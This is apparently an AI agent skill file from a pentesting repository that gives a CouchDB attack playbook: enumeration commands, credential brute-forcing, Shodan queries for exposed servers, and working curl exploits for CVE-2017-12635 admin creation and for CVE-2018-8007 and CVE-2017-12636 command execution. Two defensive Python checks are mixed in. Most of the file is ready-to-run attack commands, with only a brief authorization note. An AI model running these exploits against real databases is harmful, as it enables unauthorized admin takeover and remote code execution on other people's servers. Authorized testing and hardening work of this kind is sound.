Hacktricks-skills couchdb-pentest

Pentest CouchDB databases on ports 5984/6984. Use this skill whenever the user mentions CouchDB, document databases, port 5984, port 6984, or needs to enumerate/exploit CouchDB instances. This includes database enumeration, credential testing, privilege escalation, and RCE exploitation.

source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/5984-pentesting-couchdb/SKILL.MD

CouchDB Pentesting

A comprehensive skill for testing CouchDB document-oriented databases for security vulnerabilities.

Quick Start

# Basic enumeration
curl http://<IP>:5984/

# List all databases
curl http://<IP>:5984/_all_dbs

# With credentials
curl http://<user>:<password>@<IP>:5984/_all_dbs

Enumeration

Automatic Enumeration

Use these tools for initial reconnaissance:

# Nmap scripts
nmap -sV --script couchdb-databases,couchdb-stats -p 5984 <IP>

# Metasploit
msfconsole
use auxiliary/scanner/couchdb/couchdb_enum
set RHOSTS <IP>
run

Manual Enumeration

Banner Grabbing

curl http://<IP>:5984/

Expected responses:

  • {"couchdb":"Welcome","version":"0.10.1"} - Version info
  • {"error":"unauthorized","reason":"Authentication required."} - Auth required (401)

Information Endpoints

These endpoints reveal system information:

| Endpoint | Description |
|---|---|
| /_active_tasks | Running tasks with status and process IDs |
| /_all_dbs | List of all databases |
| /_cluster_setup | Cluster status and configuration |
| /_db_updates | Database events (requires _global_changes) |
| /_membership | Cluster nodes information |
| /_scheduler/jobs | Replication jobs with source/target info |
| /_scheduler/docs | Replication document states |
| /_node/_local | Current Erlang node name |
| /_node/_local/_stats | Server statistics |
| /_node/_local/_system | System-level statistics |
| /_up | Server health check |
| /_uuids | Generate UUIDs |
| /_reshard | Resharding job status |

Database Enumeration

# List all databases
curl -X GET http://<IP>:5984/_all_dbs

# Get database info
curl http://<IP>:5984/<database_name>

# List documents in database
curl -X GET http://<IP>:5984/<database_name>/_all_docs

# Read specific document
curl -X GET http://<IP>:5984/<database_name>/<document_id>

Authentication Testing

Credential Discovery

If you receive 401 Unauthorized responses, try:

  1. Brute force - Use common credentials or password lists
  2. Default credentials - Check for admin:admin, couchdb:couchdb
  3. Extract from configs - Look for credentials in backup files or configs

Using Credentials

# Credentials embedded in the URL (userinfo)
curl http://<user>:<password>@<IP>:5984/_all_dbs

# Or with -u flag
curl -u <user>:<password> http://<IP>:5984/_all_dbs

Privilege Escalation

CVE-2017-12635 - Admin User Creation

Exploit JSON parser differences to create admin users:

curl -X PUT \
  -d '{"type":"user","name":"<username>","roles":["_admin"],"roles":[],"password":"<password>"}' \
  http://<IP>:5984/_users/org.couchdb.user:<username> \
  -H "Content-Type:application/json"

Note: The duplicate roles keys exploit parser differences between Erlang and JavaScript.
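A defensive check for the duplicate-key condition described above, written as an added example (not code from the original page or from CouchDB): it rejects any request body that repeats a member name and shows how a first-wins and a last-wins reader disagree on roles. The function names and the sample bodies are constructed for illustration.

```python
import json

def _first_wins(pairs):
    """Build a dict that keeps the first occurrence of each member name."""
    out = {}
    for key, value in pairs:
        out.setdefault(key, value)
    return out

def parser_views(body: str):
    """Return (first_wins, last_wins) readings of the same JSON text."""
    last = json.loads(body)  # Python's json keeps the last duplicate
    first = json.loads(body, object_pairs_hook=_first_wins)
    return first, last

def duplicate_keys(body: str):
    """List member names that occur more than once in any object of the body."""
    dups = []

    def hook(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen:
                dups.append(key)
            seen.add(key)
        return dict(pairs)

    json.loads(body, object_pairs_hook=hook)
    return dups

def check_user_doc(body: str):
    """Verdict for a body destined for the _users database."""
    dups = duplicate_keys(body)
    first, last = parser_views(body)
    return {
        "duplicate_keys": dups,
        "roles_disagree": first.get("roles") != last.get("roles"),
        "reject": bool(dups),  # policy assumption: any duplicate key is refused
    }

# Constructed sample bodies (placeholder name and password).
SUSPECT = '{"type":"user","name":"alice","roles":["_admin"],"roles":[],"password":"x"}'
BENIGN = '{"type":"user","name":"alice","roles":[],"password":"x"}'

if __name__ == "__main__":
    print(check_user_doc(SUSPECT))
    print(check_user_doc(BENIGN))
```

The same check can run in a reverse proxy in front of port 5984 or over captured request bodies during incident review.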

Remote Code Execution

CVE-2018-8007 - Configuration Injection

Requires write access to the local.ini file:

# Inject command via CORS configuration
curl -X PUT \
  'http://<user>:<password>@<IP>:5984/_node/couchdb@<IP>/_config/cors/origins' \
  -H "Accept: application/json" \
  -H "Content-Type: application/json" \
  -d "<origin>\n\n[os_daemons]\ntestdaemon = /path/to/command"

# Restart CouchDB to trigger execution
kill <couchdb_process_id>

CVE-2017-12636 - Query Server Exploitation

Requires write access to local.ini:

# Add custom query server
curl -X PUT \
  'http://<user>:<password>@<IP>:5984/_node/couchdb@<IP>/_config/query_servers/cmd' \
  -d '"/path/to/command"'

# Create database and design document
curl -X PUT 'http://<user>:<password>@<IP>:5984/<dbname>'
curl -X PUT 'http://<user>:<password>@<IP>:5984/<dbname>/_design/<viewname>' \
  -d '{"_id": "_design/<viewname>", "views": {"anything": {"map": ""} }, "language": "cmd"}'

# Trigger execution
curl http://<user>:<password>@<IP>:5984/<dbname>/_design/<viewname>/_view/anything
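For the two configuration-based issues above (CVE-2018-8007 and CVE-2017-12636), an added audit example that is not part of the original page or of CouchDB: it reads a local.ini and reports any [os_daemons] entry and any [query_servers] entry outside an expected set, and it flags config values that carry line breaks. The expected-server set, the function names and the sample file are assumptions made for this example.

```python
import configparser

# Assumption: the query servers this deployment expects; adjust to your baseline.
EXPECTED_QUERY_SERVERS = {"javascript", "coffeescript"}

def has_line_break(value: str) -> bool:
    """True if a config value carries CR/LF, which could open a new section on disk."""
    return "\r" in value or "\n" in value

def audit_local_ini(text: str):
    """Return (section, key, value, reason) findings that need review."""
    cfg = configparser.ConfigParser(strict=False, interpolation=None)
    cfg.optionxform = str  # keep key case exactly as written
    cfg.read_string(text)
    findings = []
    if cfg.has_section("os_daemons"):
        for key, value in cfg.items("os_daemons"):
            findings.append(("os_daemons", key, value, "os_daemons entry (external process)"))
    if cfg.has_section("query_servers"):
        for key, value in cfg.items("query_servers"):
            if key not in EXPECTED_QUERY_SERVERS:
                findings.append(("query_servers", key, value, "unexpected query server"))
    return findings

# Constructed local.ini using the page's placeholder paths.
SAMPLE_INI = """\
[cors]
origins = example

[os_daemons]
testdaemon = /path/to/command

[query_servers]
javascript = /path/to/couchjs /path/to/main.js
cmd = /path/to/command
"""

if __name__ == "__main__":
    for finding in audit_local_ini(SAMPLE_INI):
        print(finding)
```

Run it against local.ini on a schedule and after any config change; has_line_break fits wherever config values are validated before they reach the _config API.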

Erlang Cookie Exploitation

If port 4369 (EPMD) is accessible:

  1. Extract the Erlang cookie from the system
  2. Use it to connect to the Erlang node
  3. Execute arbitrary code via the Erlang shell

See the Erlang EPMD pentesting guide for detailed exploitation steps.

Shodan Queries

# Find CouchDB instances
port:5984 couchdb

# Find unauthenticated instances
port:5984 "Welcome"

# Find specific versions
port:5984 "version":"2.0.0"

Common Databases to Check

  • _users
    - User accounts
  • _replicator
    - Replication configurations
  • _global_changes
    - Change tracking
  • _metadata
    - Metadata storage

Safety Notes

  • Always test in authorized environments only
  • RCE exploits may crash the CouchDB service
  • Backup configurations before testing
  • Document all findings for remediation
